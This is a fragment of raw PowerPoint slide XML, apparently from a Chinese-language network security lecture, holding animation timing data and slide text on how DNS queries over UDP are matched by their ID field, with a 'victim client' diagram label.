                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="51" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="52" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="481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8140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48140"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="64" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="481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48141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48141"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="77" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="78" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4814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48142"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48142"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="90" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="91" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="481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8143"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48143"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="103" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="104" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4814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8144"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48144"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="116" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="117" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48150"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48150"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48150"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48150"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48150"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48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ldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="48136" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="48137" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="48138" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="48139" grpId="0" animBg="1"/>
      <p:bldP spid="48140" grpId="0" animBg="1"/>
      <p:bldP spid="48141" grpId="0" animBg="1"/>
      <p:bldP spid="48142" grpId="0" animBg="1"/>
      <p:bldP spid="48143" grpId="0" animBg="1"/>
      <p:bldP spid="48144" grpId="0" animBg="1"/>
      <p:bldP spid="48145" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="48146" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="48147" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="48148" grpId="0" bldLvl="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zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话的验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>查询和应答是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的应用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>验证不同的查询/应答是依靠报文中的标识段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ID）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="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0" y="46433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a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1485900" y="5651400"/>
            <a:ext cx="1211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受害客户端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6" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20903199">
            <a:off x="2451100" y="5006875"/>
            <a:ext cx="2951163" cy="684213"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 932652 w 3408218"/>
              <a:gd name="T1" fmla="*/ 4903784 h 498763"/>
              <a:gd name="T2" fmla="*/ 471201 w 3408218"/>
              <a:gd name="T3" fmla="*/ 7764298 h 498763"/>
              <a:gd name="T4" fmla="*/ 0 w 3408218"/>
              <a:gd name="T5" fmla="*/ 0 h 498763"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3408218"/>
              <a:gd name="T10" fmla="*/ 0 h 498763"/>
              <a:gd name="T11" fmla="*/ 3408218 w 3408218"/>
              <a:gd name="T12" fmla="*/ 498763 h 498763"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
